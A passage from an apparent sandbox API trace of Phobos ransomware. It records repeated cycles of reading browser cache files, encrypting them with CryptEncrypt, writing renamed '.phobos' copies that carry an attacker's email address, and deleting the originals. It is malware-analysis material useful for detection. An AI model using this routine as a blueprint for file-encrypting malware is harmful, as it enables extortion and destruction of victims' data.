hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.177] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.177] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x9b7, lpOverlapped=0x0) returned 1 [0184.290] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9c0, dwBufLen=0x9c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9c0) returned 1 [0184.290] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x9c0, lpOverlapped=0x0) returned 1 [0184.291] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0184.291] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.291] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.291] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.291] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.291] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.291] CloseHandle (hObject=0xb8) returned 1 [0184.291] CloseHandle (hObject=0x140) returned 1 [0184.291] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgTxB[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbegtxb[1].jpg")) returned 1 [0184.292] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBs47TE[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbs47te[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.292] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=575) returned 1 [0184.292] CloseHandle (hObject=0x140) returned 1 [0184.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBs47TE[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbs47te[1].png")) returned 0x2020 [0184.293] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBs47TE[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbs47te[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBs47TE[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbs47te[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.293] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.293] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBs47TE[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbs47te[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.293] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.293] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.294] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x23f, lpOverlapped=0x0) returned 1 [0184.307] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x240, dwBufLen=0x240 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x240) returned 1 [0184.307] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x240, lpOverlapped=0x0) returned 1 [0184.310] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0184.310] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.310] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.310] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0184.310] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.310] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.310] CloseHandle (hObject=0x140) returned 1 [0184.310] CloseHandle (hObject=0xb8) returned 1 [0184.310] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBs47TE[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbs47te[1].png")) returned 1 [0184.311] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BByazif[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbyazif[2].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.312] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=8844) returned 1 [0184.312] CloseHandle (hObject=0xb8) returned 1 [0184.312] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BByazif[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbyazif[2].jpg")) returned 0x2020 [0184.312] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BByazif[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbyazif[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BByazif[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbyazif[2].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.312] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.312] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BByazif[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbyazif[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.313] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.313] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.313] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x228c, lpOverlapped=0x0) returned 1 [0184.359] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2290, dwBufLen=0x2290 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2290) returned 1 [0184.359] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2290, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2290, lpOverlapped=0x0) returned 1 [0184.360] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a68) returned 1 [0184.360] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.360] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0184.360] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.360] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0184.360] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.360] CloseHandle (hObject=0xb8) returned 1 [0184.360] CloseHandle (hObject=0x140) returned 1 [0184.360] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BByazif[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbyazif[2].jpg")) returned 1 [0184.361] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-components[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-components[1].css"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.361] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=44819) returned 1 [0184.361] CloseHandle (hObject=0x140) returned 1 [0184.362] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-components[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-components[1].css")) returned 0x2020 [0184.362] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-components[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-components[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-components[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-components[1].css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.362] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.362] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-components[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-components[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.362] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.362] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.362] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xaf13, lpOverlapped=0x0) returned 1 [0184.402] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xaf20, dwBufLen=0xaf20 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xaf20) returned 1 [0184.402] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xaf20, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xaf20, lpOverlapped=0x0) returned 1 [0184.404] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a68) returned 1 [0184.404] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.404] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0184.404] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.404] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0184.404] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.404] CloseHandle (hObject=0x140) returned 1 [0184.404] CloseHandle (hObject=0xb8) returned 1 [0184.404] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-components[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-components[1].css")) returned 1 [0184.405] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome.min[1].css"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.406] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=172095) returned 1 [0184.406] CloseHandle (hObject=0xb8) returned 1 [0184.406] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome.min[1].css")) returned 0x2020 [0184.406] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome.min[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome.min[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome.min[1].css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0184.406] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.406] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0184.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome.min[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome.min[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.406] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0184.406] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.407] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2a03f, lpOverlapped=0x0) returned 1 [0184.454] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2a040, dwBufLen=0x2a040 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2a040) returned 1 [0184.455] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2a040, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2a040, lpOverlapped=0x0) returned 1 [0184.458] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0184.458] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0184.458] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0184.458] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0184.458] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0184.458] CryptDestroyKey (hKey=0xa327e8) returned 1 [0184.458] CloseHandle (hObject=0xb8) returned 1 [0184.458] CloseHandle (hObject=0x140) returned 1 [0184.458] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome.min[1].css")) returned 1 [0184.460] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0184.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome_throbber_fast_16[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\chrome_throbber_fast_16[1].gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.461] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1548) returned 1 [0184.461] CloseHandle (hObject=0x140) returned 1 [0184.461] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\chrome_throbber_fast_16[1].gif" (normalized: 